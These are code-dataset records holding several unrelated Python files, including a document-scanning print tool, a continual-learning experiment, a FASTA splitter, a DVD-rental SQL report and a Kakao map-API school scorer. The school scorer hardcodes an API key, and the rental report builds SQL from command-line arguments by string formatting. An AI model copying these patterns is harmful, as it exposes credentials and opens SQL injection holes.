key_name)\nelse:\n base_path = \"\"\n key_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), key_name)\n \nSCALE_EXE = os.path.join(base_path, 'bin', 'scale.exe')\nSIMHEI_TTF = os.path.join(base_path, 'bin', 'simhei.ttf')\nPDFTOPRINTER_EXE = os.path.join(base_path, 'bin', 'PDFtoPrinter.exe')\nTRAIL_USE_DAY = 14\n\n#def encrypt(info):\n# msg = info\n# BLOCK_SIZE = 16\n# PAD = \"{\"\n# padding = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PAD\n# cipher = AES.new(hkey, AES.MODE_ECB)\n# result = cipher.encrypt(padding(msg).encode('utf-8'))\n# return result \n#\n#def decrypt(info):\n# msg = info\n# PAD = \"{\"\n# decipher = AES.new(hkey, AES.MODE_ECB)\n# pt = decipher.decrypt(msg).decode('utf-8')\n# pad_index = pt.find(PAD)\n# result = pt[: pad_index]\n# return result \n \n#def integrity_test(window, text):\n# if not os.path.exists(key_path):\n# return False\n# \n# with open(key_path, 'rb') as f:\n# plain_text = decrypt(f.read())\n# \n# uuid = subprocess.Popen(['wmic', 'csproduct','get' ,'UUID'],shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.read().decode('ascii')\n# return str(plain_text[8:]) == uuid \n \ndef LOG(info, text):\n text.insert(\"insert\", str(info)+'\\n')\n \ndef DEBUG(info, text):\n if args.debug:\n LOG(info, text)\n\ndef safe_remove(filename):\n safe_remove_count = 1\n while os.path.exists(filename):\n try:\n os.remove(filename)\n except:\n safe_remove_count += 1\n pass\n return safe_remove_count\n\ndef STEP_LOG(msg, path):\n log_update_sucess_retry = 0\n now = datetime.datetime.now()\n \n while log_update_sucess_retry < 10:\n try:\n now_str = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n msg = msg.encode('utf-8', 'ignore').decode('utf-8', 'ignore')\n with open(path, \"a\", encoding=\"utf-8\") as f:\n f.write('[%s] %s\\n' % (now_str, msg))\n break\n except:\n log_update_sucess_retry += 1\n \n try:\n if log_update_sucess_retry == 10:\n now_str = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n with open(path, \"a\") as f:\n f.write('[%s] tried to log 10 times but still fail\\n' % (now_str))\n except:\n pass\n \ndef worker(scanner, window, text):\n \n # Check Dropbox.exe is active\n dropbox_path1 = r'C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe'\n dropbox_path2 = r'C:\\Program Files\\Dropbox\\Client\\Dropbox.exe'\n find, success = False, False\n for p in psutil.process_iter():\n try:\n name = p.name()\n except:\n name = ''\n continue\n if \"Dropbox.exe\" == name:\n find = True\n break\n \n if not find:\n try:\n # if not active, try the C:\\ version\n if os.path.exists(dropbox_path1):\n subprocess.Popen('\"%s\"' % dropbox_path1)\n success = True\n # try another\n elif os.path.exists(dropbox_path2):\n subprocess.Popen('\"%s\"' % dropbox_path2)\n success = True\n except:\n pass\n \n if not success:\n # if none of them works, warning and leave\n from tkinter import messagebox\n messagebox.showerror(\"錯誤\", \"請重新啟動Dropbox!!!\")\n #sys.exit(0)\n \n if u'輸入' not in os.listdir():\n LOG('創建資料夾:輸入', text)\n os.mkdir(u'輸入')\n \n if u'輸出' not in os.listdir():\n LOG('創建資料夾:輸出', text)\n os.mkdir(u'輸出')\n \n if u'原圖' not in os.listdir():\n LOG('創建資料夾:原圖', text)\n os.mkdir(u'原圖')\n \n if JSON_FILE not in os.listdir():\n d = {}\n json.dump(d, open(JSON_FILE, \"w\"))\n \n images = os.listdir(u'輸入')\n \n for image in images:\n im_file_path = os.path.join(u'輸入', image)\n \n # record current time\n use_internet_time = True\n try:\n res = urlopen('http://just-the-time.appspot.com/')\n time_str = res.read().strip().decode('utf-8')\n year, month, day = int(time_str[:4]), int(time_str[5:7]), int(time_str[8:10])\n hour, minute, second = int(time_str[11:13]), int(time_str[14:16]), int(time_str[17:19])\n now = (datetime.datetime(year, month, day, hour, minute, second)+datetime.timedelta(hours=8))\n except:\n use_internet_time = False\n now = datetime.datetime.now()\n \n convert_to_image_count = 1\n print_count = 1\n LOG('找到了 %s' % im_file_path, text)\n try:\n # Backup the image first\n backup_folder = os.path.join(u'原圖', now.strftime(\"%Y%m%d\"))\n if not os.path.exists(backup_folder):\n os.mkdir(backup_folder)\n back_path = os.path.join(backup_folder, image)\n \n log_path = os.path.join(backup_folder, DAILY_FILE)\n STEP_LOG('Start to process %s' % im_file_path, log_path)\n if use_internet_time:\n STEP_LOG('Using use_internet_time %s' % now , log_path)\n else:\n STEP_LOG('Using local time %s' % now, log_path)\n \n # Backup to origin\n copyfile(im_file_path, back_path)\n STEP_LOG('Backup to %s done' % back_path, log_path)\n \n im = cv2.imdecode(np.fromfile(im_file_path, dtype=np.uint8),-1)\n (h, w) = im.shape[:2]\n \n STEP_LOG('Get H/W of image done', log_path)\n \n # If image is too small, scale up\n try:\n if h*w <= 500*500:\n STEP_LOG('Image too small, try to scale up', log_path)\n output = subprocess.call([SCALE_EXE, im_file_path, '-B', '-O', '-s:200'])\n STEP_LOG('Image too small, try to scale up done', log_path)\n except:\n pass\n \n \n # Process the image\n STEP_LOG('Process the image', log_path)\n prefix = now.strftime(\"%Y%m%d%H%M%S\")\n scanner.scan(im_file_path, u'輸出', prefix)\n STEP_LOG('Process the image done', log_path)\n \n new_file_path = os.path.join(u'輸出', '{0}_{1}'.format(prefix, image))\n LOG('輸出至 %s.pdf' % new_file_path, text)\n \n # 王元元_test_20201012235527-382722.jpg\n pattern = '^(.*?)_(.*?)_(..............)-......\\.'\n \n date_file_path = os.path.join(u'輸出', 'date_{0}_{1}'.format(prefix, image))\n \n # If image is from server, add timestamps\n m = re.match(pattern, image)\n if m:\n STEP_LOG('Image is from server, add timestamps', log_path)\n from PIL import Image\n from PIL import ImageDraw \n from PIL import ImageFont \n \n d = json.load(open(JSON_FILE, \"r\"))\n date = now.strftime(\"%Y/%m/%d\")\n if date not in d or not isinstance(d[date], dict):\n d[date] = {}\n \n from_who = m.group(1)\n to_whom = m.group(2)\n ts = m.group(3)\n \n if from_who not in d[date]:\n d[date][from_who] = 0\n d[date][from_who] += 1\n \n json_update_sucess = False\n while not json_update_sucess:\n try:\n json.dump(d, open(JSON_FILE, \"w\"))\n json_update_sucess = True\n except:\n pass\n \n year, month, day = ts[:4], ts[4:6], ts[6:8]\n hour, minute, second = ts[8:10], ts[10:12], ts[12:]\n recieve_time = u'接收時間: '\n recieve_time += u'%s/%s/%s %s:%s:%s' % (year, month, day, hour, minute, second)\n \n print_time = u'列印時間: '\n print_time += now.strftime(\"%Y/%m/%d %H:%M:%S\")\n print_time += u' %s 傳給 %s 第 %d 張' % (from_who, to_whom, d[date][from_who])\n \n STEP_LOG(u'add %s 傳給 %s 第 %d 張 to image' % (from_who, to_whom, d[date][from_who]), log_path)\n \n origin_img = Image.open(new_file_path).convert('RGB').rotate(90, expand=True)\n if origin_img.size[0] <= 720:\n text_width = 20\n font = ImageFont.truetype(SIMHEI_TTF, 16, encoding=\"utf-8\")\n elif origin_img.size[0] <= 1440:\n text_width = 30\n font = ImageFont.truetype(SIMHEI_TTF, 24, encoding=\"utf-8\")\n else:\n text_width = 40\n font = ImageFont.truetype(SIMHEI_TTF, 36, encoding=\"utf-8\")\n \n STEP_LOG('Start to extend image', log_path)\n # Extend\n width, height = origin_img.size\n img = Image.new(origin_img.mode, (width, height+48), (255, 255, 255))\n img.paste(origin_img, (0, text_width*2))\n \n STEP_LOG('Start to draw image', log_path)\n draw = ImageDraw.Draw(img)\n draw.text((10, 0), recieve_time, (0, 0, 0), font=font)\n draw.text((10, text_width), print_time, (0, 0, 0), font=font)\n img = img.rotate(-90, expand=True)\n STEP_LOG('Start to save to new path', log_path)\n img.save(date_file_path)\n else:\n STEP_LOG('Not fit format, bypass the add timestamp process', log_path)\n copyfile(new_file_path, date_file_path)\n \n # Convert into pdf\n \n while convert_to_image_count < 4:\n try:\n STEP_LOG('Convert to image, count %d' % convert_to_image_count, log_path)\n with open(os.path.abspath(\"%s.pdf\" % date_file_path), 'wb') as f:\n f.write(img2pdf.convert(os.path.abspath(date_file_path), fit='fill'))\n STEP_LOG('Convert to image done', log_path)\n break\n except:\n convert_to_image_count += 1\n \n \n LOG('刪除 %s' % im_file_path, text)\n STEP_LOG('Try to remove %s' % im_file_path, log_path)\n count = safe_remove(im_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (im_file_path, count), log_path)\n \n LOG('列印 %s' % im_file_path, text)\n if not args.debug:\n \n while print_count < 4:\n try:\n STEP_LOG('Print pdf, count %d' % print_count, log_path)\n subprocess.call([PDFTOPRINTER_EXE, \"%s.pdf\" % os.path.abspath(date_file_path)])\n STEP_LOG('Print pdf, done', log_path)\n break\n except:\n print_count += 1\n \n STEP_LOG('Try to remove %s' % new_file_path, log_path)\n count = safe_remove(new_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (new_file_path, count), log_path)\n \n STEP_LOG('Try to remove %s' % (\"%s.pdf\" % os.path.abspath(date_file_path)), log_path)\n count = safe_remove(\"%s.pdf\" % os.path.abspath(date_file_path))\n STEP_LOG('Try to remove %s done, try %d time' % (\"%s.pdf\" % os.path.abspath(date_file_path), count), log_path)\n \n STEP_LOG('Try to remove %s' % date_file_path, log_path)\n count = safe_remove(date_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (date_file_path, count), log_path)\n STEP_LOG('SUCCESS', log_path)\n \n except:\n LOG('處理 %s 失敗' % im_file_path, text)\n STEP_LOG('[!!!!Exception!!!!!]', log_path)\n STEP_LOG('convert_to_image_count = %d' % convert_to_image_count, log_path)\n STEP_LOG('print_count = %d' % print_count, log_path)\n \n folders = os.listdir(u'原圖')\n now = datetime.datetime.now()\n # Step 2, delete the folder that is expire\n for folder in folders:\n try:\n date = datetime.datetime.strptime(folder, \"%Y%m%d\")\n if (now - date).days >= 7:\n rmtree(os.path.join(u'原圖', folder))\n LOG('刪除原圖 %s' % folder, text)\n except:\n traceback.print_exc()\n pass\n \n window.after(1000, worker, scanner, window, text)\n \n\nif __name__ == \"__main__\":\n from tkinter import messagebox\n \n try:\n me = SingleInstance()\n except:\n messagebox.showerror(\"錯誤\", \"請勿重複開啟銳利化程式!!!\")\n sys.exit(1)\n \n try:\n if not internet_checker.check_internet_on():\n messagebox.showerror(\"錯誤\", \"請先開啟網路!!!\")\n raise RuntimeError('No internet connection')\n except:\n print('Internet check fail')\n sys.exit(1) \n \n try:\n url = 'https://raw.githubusercontent.com/wty1143/OpenCV-Document-Scanner/master/version_info.txt'\n res = urlopen(url)\n version_str = float(res.read().strip().decode('utf-8')[8:])\n if version_str > float(VERSION):\n messagebox.showerror(\"錯誤\", \"請更新主程式!!!\")\n raise RuntimeError('Version too old error')\n except RuntimeError:\n print('Version check fail')\n sys.exit(1)\n except:\n pass\n \n\n \n global args\n ap = argparse.ArgumentParser()\n #ap.add_argument(\"--make_key\", action='store_true')\n ap.add_argument(\"--debug\", action='store_true')\n \n args = ap.parse_args()\n \n #def register(info, expire):\n # if info != '55665566':\n # print('密碼錯誤')\n # sys.exit(0)\n # \n # uuid = subprocess.Popen(['wmic', 'csproduct','get' ,'UUID'], \n # shell=True, \n # stdout=subprocess.PIPE, \n # stderr=subprocess.PIPE, \n # stdin=subprocess.PIPE).stdout.read().decode('ascii')\n # \n # ciphertext = encrypt(expire.strftime(\"%Y%m%d\")+uuid)\n # \n # with open(key_path, 'wb') as f:\n # f.write(ciphertext)\n # sys.exit(0)\n\n #if args.make_key:\n # print('註冊中')\n # \n # d = datetime.timedelta(days = 80*365)\n # expire = datetime.datetime.now()\n #\n # \n # parent = Tk()\n # widget = Entry(parent, textvariable='註冊碼', bd=5, show=\"*\", width=30)\n # widget.pack()\n # parent.bind('', lambda v: register(widget.get(), expire))\n # parent.mainloop()\n \n \n window = Tk()\n window.title('自動黑白銳利化')\n window.geometry('400x300')\n window.configure(background='white')\n\n text = Text(window, width=360, height=280)\n text.pack()\n \n #if not integrity_test(window, text):\n # sys.exit(0)\n \n # Force disable interactive_mode\n scanner = scan.DocScanner(False)\n LOG(\"銳利化程式執行中 版本 %s\" % VERSION, text)\n \n version_update_sucess = False\n while not version_update_sucess:\n try:\n with open('version.txt', 'w') as f:\n f.write(VERSION)\n version_update_sucess = True\n except:\n pass\n \n window.after(1000, worker, scanner, window, text)\n \n window.mainloop()","sub_path":"auto_scan.py","file_name":"auto_scan.py","file_ext":"py","file_size_in_byte":19499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286007187","text":"#!/usr/bin/env python3\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.optim import SGD\nfrom torchvision.transforms import ToTensor\n\nfrom avalanche.benchmarks.classic import SplitCIFAR100\nfrom avalanche.evaluation.metrics import accuracy_metrics, loss_metrics\nfrom avalanche.logging import InteractiveLogger\nfrom avalanche.training.plugins import EvaluationPlugin\nfrom avalanche.training.supervised import ER_AML\nfrom experiments.utils import create_default_args, set_seed\nfrom models import SingleHeadReducedResNet18\n\n\ndef eraml_scifar100(override_args=None):\n \"\"\"\n Reproducing ER-AML experiments from paper\n \"New insights on Reducing Abrupt Representation Change in Online Continual Learning\"\n by Lucas Caccia et. al\n https://openreview.net/forum?id=N8MaByOzUfb\n \"\"\"\n args = create_default_args(\n {\n \"cuda\": 0,\n \"mem_size\": 10000,\n \"lr\": 0.1,\n \"temp\": 0.1,\n \"train_mb_size\": 10,\n \"seed\": None,\n \"batch_size_mem\": 10,\n },\n override_args,\n )\n set_seed(args.seed)\n fixed_class_order = np.arange(100)\n device = torch.device(\n f\"cuda:{args.cuda}\" if torch.cuda.is_available() and args.cuda >= 0 else \"cpu\"\n )\n unique_transform = transforms.Compose(\n [\n ToTensor(),\n transforms.Normalize((0.5071, 0.4866, 0.4409), (0.2009, 0.1984, 0.2023)),\n ]\n )\n scenario = SplitCIFAR100(\n 20,\n return_task_id=False,\n seed=0,\n fixed_class_order=fixed_class_order,\n shuffle=True,\n class_ids_from_zero_in_each_exp=False,\n train_transform=unique_transform,\n eval_transform=unique_transform,\n )\n input_size = (3, 32, 32)\n model = SingleHeadReducedResNet18(100)\n optimizer = SGD(model.parameters(), lr=args.lr)\n interactive_logger = InteractiveLogger()\n loggers = [interactive_logger]\n training_metrics = []\n evaluation_metrics = [\n accuracy_metrics(epoch=True, stream=True),\n loss_metrics(epoch=True, stream=True),\n ]\n evaluator = EvaluationPlugin(\n *training_metrics,\n *evaluation_metrics,\n loggers=loggers,\n )\n plugins = []\n cl_strategy = ER_AML(\n model=model,\n feature_extractor=model.feature_extractor,\n optimizer=optimizer,\n plugins=plugins,\n evaluator=evaluator,\n device=device,\n train_mb_size=args.train_mb_size,\n eval_mb_size=64,\n mem_size=args.mem_size,\n batch_size_mem=args.batch_size_mem,\n )\n for t, experience in enumerate(scenario.train_stream):\n cl_strategy.train(\n experience,\n num_workers=0,\n drop_last=True,\n )\n cl_strategy.eval(scenario.test_stream[: t + 1])\n results = cl_strategy.eval(scenario.test_stream)\n return results\n\n\nif __name__ == \"__main__\":\n res = eraml_scifar100()\n print(res)\n","sub_path":"experiments/split_cifar100/er_aml.py","file_name":"er_aml.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277389279","text":"#!/usr/bin/python\nimport os\nimport sys\nimport gzip\n\nfilename_fa = sys.argv[1]\n\nh = ''\nseq_list = dict()\nseqlen = dict()\nf_fa = open(filename_fa,'r')\nif( filename_fa.endswith('.gz') ):\n f_fa = gzip.open(filename_fa,'rb')\nfor line in f_fa:\n if( line.startswith('>') ):\n h = line.strip().lstrip('>')\n seq_list[h] = []\n seqlen[h] = 0\n else:\n seq_list[h].append( line.strip() )\n seqlen[h] += len( line.strip() )\nf_fa.close()\n\nfilename_base = filename_fa.replace('.fasta','').replace('.fa','').replace('_fa','').replace('.gz','')\n\nf_lt10k = open('%s_lt10k_fa'%filename_base,'w')\nf_set10k = open('%s_set10k_fa'%filename_base,'w')\n\nis_lt10k = 0\nfor tmp_h in sorted( seqlen.keys(), key=seqlen.get, reverse=True):\n tmp_seq = ''.join(seq_list[tmp_h])\n if( len(tmp_seq) > 10000 ):\n f_lt10k.write('>%s\\n%s\\n'%(tmp_h,tmp_seq))\n else:\n f_set10k.write('>%s\\n%s\\n'%(tmp_h,tmp_seq))\n\nf_lt10k.close()\nf_set10k.close()\n","sub_path":"fasta/split-lt10k-set10k.py","file_name":"split-lt10k-set10k.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"229452315","text":"# Copyright (C) 2010-2011 Richard Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom CIM16.IEC61970.Core.Curve import Curve\n\nclass FuelAllocationSchedule(Curve):\n \"\"\"The amount of fuel of a given type which is allocated for consumption over a specified period of timeThe amount of fuel of a given type which is allocated for consumption over a specified period of time\n \"\"\"\n\n def __init__(self, minFuelAllocation=0.0, fuelAllocationEndDate='', maxFuelAllocation=0.0, fuelAllocationStartDate='', fuelType=\"oil\", FossilFuel=None, ThermalGeneratingUnit=None, *args, **kw_args):\n \"\"\"Initialises a new 'FuelAllocationSchedule' instance.\n\n @param minFuelAllocation: The minimum amount fuel that is allocated for consumption for the scheduled time period, e.g., based on a 'take-or-pay' contract \n @param fuelAllocationEndDate: The end time and date of the fuel allocation schedule \n @param maxFuelAllocation: The maximum amount fuel that is allocated for consumption for the scheduled time period \n @param fuelAllocationStartDate: The start time and date of the fuel allocation schedule \n @param fuelType: The type of fuel, which also indicates the corresponding measurement unit Values are: \"oil\", \"coal\", \"lignite\", \"gas\"\n @param FossilFuel: A fuel allocation schedule must have a fossil fuel\n @param ThermalGeneratingUnit: A thermal generating unit may have one or more fuel allocation schedules\n \"\"\"\n #: The minimum amount fuel that is allocated for consumption for the scheduled time period, e.g., based on a 'take-or-pay' contract\n self.minFuelAllocation = minFuelAllocation\n\n #: The end time and date of the fuel allocation schedule\n self.fuelAllocationEndDate = fuelAllocationEndDate\n\n #: The maximum amount fuel that is allocated for consumption for the scheduled time period\n self.maxFuelAllocation = maxFuelAllocation\n\n #: The start time and date of the fuel allocation schedule\n self.fuelAllocationStartDate = fuelAllocationStartDate\n\n #: The type of fuel, which also indicates the corresponding measurement unit Values are: \"oil\", \"coal\", \"lignite\", \"gas\"\n self.fuelType = fuelType\n\n self._FossilFuel = None\n self.FossilFuel = FossilFuel\n\n self._ThermalGeneratingUnit = None\n self.ThermalGeneratingUnit = ThermalGeneratingUnit\n\n super(FuelAllocationSchedule, self).__init__(*args, **kw_args)\n\n _attrs = [\"minFuelAllocation\", \"fuelAllocationEndDate\", \"maxFuelAllocation\", \"fuelAllocationStartDate\", \"fuelType\"]\n _attr_types = {\"minFuelAllocation\": float, \"fuelAllocationEndDate\": str, \"maxFuelAllocation\": float, \"fuelAllocationStartDate\": str, \"fuelType\": str}\n _defaults = {\"minFuelAllocation\": 0.0, \"fuelAllocationEndDate\": '', \"maxFuelAllocation\": 0.0, \"fuelAllocationStartDate\": '', \"fuelType\": \"oil\"}\n _enums = {\"fuelType\": \"FuelType\"}\n _refs = [\"FossilFuel\", \"ThermalGeneratingUnit\"]\n _many_refs = []\n\n def getFossilFuel(self):\n \"\"\"A fuel allocation schedule must have a fossil fuel\n \"\"\"\n return self._FossilFuel\n\n def setFossilFuel(self, value):\n if self._FossilFuel is not None:\n filtered = [x for x in self.FossilFuel.FuelAllocationSchedules if x != self]\n self._FossilFuel._FuelAllocationSchedules = filtered\n\n self._FossilFuel = value\n if self._FossilFuel is not None:\n if self not in self._FossilFuel._FuelAllocationSchedules:\n self._FossilFuel._FuelAllocationSchedules.append(self)\n\n FossilFuel = property(getFossilFuel, setFossilFuel)\n\n def getThermalGeneratingUnit(self):\n \"\"\"A thermal generating unit may have one or more fuel allocation schedules\n \"\"\"\n return self._ThermalGeneratingUnit\n\n def setThermalGeneratingUnit(self, value):\n if self._ThermalGeneratingUnit is not None:\n filtered = [x for x in self.ThermalGeneratingUnit.FuelAllocationSchedules if x != self]\n self._ThermalGeneratingUnit._FuelAllocationSchedules = filtered\n\n self._ThermalGeneratingUnit = value\n if self._ThermalGeneratingUnit is not None:\n if self not in self._ThermalGeneratingUnit._FuelAllocationSchedules:\n self._ThermalGeneratingUnit._FuelAllocationSchedules.append(self)\n\n ThermalGeneratingUnit = property(getThermalGeneratingUnit, setThermalGeneratingUnit)\n\n","sub_path":"CIM16/IEC61970/Generation/Production/FuelAllocationSchedule.py","file_name":"FuelAllocationSchedule.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277238326","text":"## creat a mapping of state to abbreviation\r\n#states = {\r\n# 'Oregon': 'OR',\r\n# 'Florida': 'FL',\r\n# 'California': 'CA',\r\n# 'New York': 'NY',\r\n# 'Michigan': 'MI'\r\n# }\r\n#\r\n# creat a basic set of states and some cities in them\r\ncities = {\r\n 'CA': 'San Francisco',\r\n 'MI': 'Detroit',\r\n 'FL': 'Jacksonville'\r\n }\r\n\r\n# add some more cities\r\ncities['NY']= 'New York'\r\ncities['OR']= 'Portland'\r\n\r\n## print out some cities\r\n#print ('_' * 10)\r\n#print (\"NY State has: \",cities['NY'])\r\n#print (\"OR State has: \",cities['OR'])\r\n#\r\n## print some states\r\n#print ('_' * 10)\r\n#print (\"Michigan's abbreviation is: \",states['Michigan'])\r\n#print (\"Florida's abbreviation is: \",states['Florida'])\r\n#\r\n## do it by using the state then cities dict\r\n#print ('_'*10)\r\n#print (\"Michigan has:\",cities[states['Michigan']])\r\n#print (\"Florida has:\" ,cities[states['Florida']])\r\n#\r\n## print every state abbreviation\r\n#print ('_'*10)\r\n#for state,abbrev in states.items():\r\n# print (\"%s is abbreviated %s\" %(state,abbrev))\r\n#\r\n## print every city in state\r\n#print ('_'*10)\r\n#for abbrev,city in cities.items():\r\n# print(\"%s has the city %s\" %(abbrev,city))\r\n#\r\n## now do both at the same time\r\n#print ('_'*10)\r\n#for state,abbrev in states.items():\r\n# print (\"%s state is abbreviated %s and has city %s\" %(state,abbrev,cities[abbrev]))\r\n#\r\n#print ('_' *10)\r\n## safely get a abbreviation by state that might not be there\r\n#state = states.get('Texas',None)\r\n#\r\n#if not state:\r\n# print (\"Sorry, no Texas.\")\r\n#\r\n##get a city with a default value\r\n#city = cities.get('TX','Does Not Exist')\r\n#print (\"The city for the state 'TX' is : %s\" %city)\r\n\r\ndef find_city(themap,state):\r\n if state in themap:\r\n return themap[state]\r\n else:\r\n return \"Not found.\"\r\n\r\n# ok pay attention!\r\ncities['_find'] = find_city\r\n#字典中又加入一个元素名字为 _find 内容为一个(名字叫find_citye的)函数\r\n#print (cities)\r\nwhile True:\r\n print (\"State? (ENTER to quit)\",)\r\n state = input(\"> \")\r\n\r\n if not state:break\r\n\r\n # this line is the most important ever! study!\r\n city_found = cities['_find'](cities,state)\r\n #词典的嵌套调用cities['_find']=find_city\r\n #即该语句=find_city(cities,state)\r\n print (city_found)\r\n","sub_path":"ex39.py","file_name":"ex39.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171733685","text":"'''\n# summary.py. Sixth programming project for CIS 211 (WQ 2015).\n\n\n# Author: Ricardo Pivetta.\n\n# This module fill all the requirements for project six, no extras.\n\n'''\nimport sqlite3\nimport sys\nfrom datetime import *\n\nif __name__ == \"__main__\":\n #setting the connection with the sql\n con = sqlite3.connect('sakila211.db')\n cursor = con.cursor()\n\n date_format = \"%Y-%m-%d %H:%M:%S.%f\"\n date_format_display = '%m-%d-%Y'\n total = 0\n #getting the arguments\n lname = sys.argv[1]\n year = sys.argv[2]\n month = sys.argv[3]\n\n #running the query to select everything that I need from the database\n query = \"select customer.first_name, film.title, customer.last_name, rental.rental_date, film.rental_rate, rental.return_date, film.rental_duration \" \\\n \" from customer \"\\\n \" join rental \"\\\n \" on customer.customer_id = rental.customer_id \"\\\n \" join inventory \"\\\n \" on rental.inventory_id = inventory.inventory_id \"\\\n \" join film \"\\\n \" on inventory.film_id = film.film_id \"\\\n \" where customer.last_name like '{0}' \"\\\n \" and strftime('%Y', rental_date) = '{1}' \"\\\n \" and strftime('%m', rental_date) like '%{2}'\"\n cursor.execute(query.format(lname,year,month))\n row = cursor.fetchall()\n\n print('')\n print('--------- Sakila DVD Rentals --------- ')\n print('')\n print(\"Monthly report for {0} {1}\\n\".format(row[0][0], lname))\n print('')\n\n #for each row in data, check the rental and return date, and also sum the price\n for i in range(len(row)):\n rented = datetime.strptime(row[i][3], date_format) #getting the rental date\n returned = datetime.strptime(row[i][5], date_format) #getting the return date\n total = total + row[i][4] #sum of the total rental price\n print('{0:<20} {1:<12} {2:<10}'.format(row[i][1],rented.strftime(date_format_display),row[i][4])) #displaying rental\n\n #checking, printing and summing the late fees\n diff = returned - rented\n if diff.days > row[i][6]:\n print(' **late fee {0} {1:6}'.format(returned.strftime(date_format_display),row[i][4]))\n total = total + row[i][4]\n\n #printing the total to pay\n print(\"\\nMonthly total: %.2f\" % total)","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"109803567","text":"import json\nimport requests\ndef school_score(address):\n elem_distance = []\n mid_distance = []\n high_distance = []\n univercity_distance = []\n elem_school=[]\n mid_school=[]\n high_school=[]\n univercity=[]\n url = \"https://dapi.kakao.com/v2/local/search/address.json?\"\n apikey = \"15423876a0c084fd44724b06f11395a9\"\n query = address # 입력 주소\n r1 = requests.get( url, params = {'query':query}, headers={'Authorization' : 'KakaoAK ' + apikey } )\n rj=r1.json()\n # print(r1.json())\n x=r1.json()['documents'][0][\"x\"]\n y=r1.json()['documents'][0][\"y\"]\n n=1\n while(True):\n url = \"https://dapi.kakao.com/v2/local/search/keyword.json?\"\n apikey = \"15423876a0c084fd44724b06f11395a9\"\n query = \"학교\"\n # 지하철SW8, 버스정류장, 편의점CS2, 마트MT1, 학교SC4, 은행BK9, 음식점FD6, 카페CE7, 병원HP8\n category_group_code = \"SC4\"\n radius=1000\n page=n # 마지막 페이지 이후 남은 페이지는 마지막 페이지와 같은 결과만 나옴\n size=15\n r = requests.get(url, params = {'query':query,'category_group_code':category_group_code,'radius':radius,'page':page,'size':size,'x':x,'y':y, 'sort': 'distance'}, headers={'Authorization' : 'KakaoAK ' + apikey } )\n r.json()\n # print(r.json())\n # print(r.json()[\"meta\"][\"total_count\"]) # 총 검색된 데이터 수\n if r.json()[\"meta\"][\"total_count\"]==0:\n print(\"검색된 데이터가 없습니다.\")\n return None\n for i in range(len(r.json()[\"documents\"])):\n # print(r.json()[\"documents\"][i][\"distance\"])\n category_name=r.json()['documents'][i]['category_name']\n if category_name=='교육,학문 > 학교 > 초등학교':\n elem_distance.append(r.json()['documents'][i]['distance'])\n elem_school.append(r.json()['documents'][i])\n elif category_name=='교육,학문 > 학교 > 중학교':\n mid_distance.append(r.json()['documents'][i]['distance'])\n mid_school.append(r.json()['documents'][i])\n elif category_name=='교육,학문 > 학교 > 대학교':\n univercity_distance.append(r.json()['documents'][i]['distance'])\n univercity.append(r.json()['documents'][i])\n else:\n high_distance.append(r.json()['documents'][i]['distance'])\n high_school.append(r.json()['documents'][i])\n\n is_end = r.json()[\"meta\"][\"is_end\"]\n # with open('jsonFile\\\\school'+str(n)+'.json', 'w', encoding='utf-8') as make_file:\n # json.dump(r.json(), make_file, ensure_ascii=False, indent=\"\\t\")\n if is_end:\n break\n n+=1\n\n # print(distance)\n\n if len(elem_school)==0:\n elem_distance.append(9999)\n if len(mid_school)==0:\n mid_distance.append(9999)\n if len(high_school)==0:\n high_distance.append(9999)\n if len(univercity)==0:\n univercity_distance.append(9999)\n\n # print(elem_school)\n # print(min(elem_distance)) # 가장 가까운 초등학교까지 거리\n # print(mid_school)\n # print(min(mid_distance)) # 가장 가까운 중학교까지 거리\n # print(high_school)\n # print(min(high_distance)) # 가장 가까운 고등학교까지 거리\n # print(univercity)\n # print(min(univercity_distance)) # 가장 가까운 대학교까지 거리\n\n return query,min(elem_distance),min(mid_distance),min(high_distance),min(univercity_distance)","sub_path":"python_data/RestApi_school.py","file_name":"RestApi_school.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"264304687","text":"#!/usr/bin/env python \n# -*- coding: utf-8 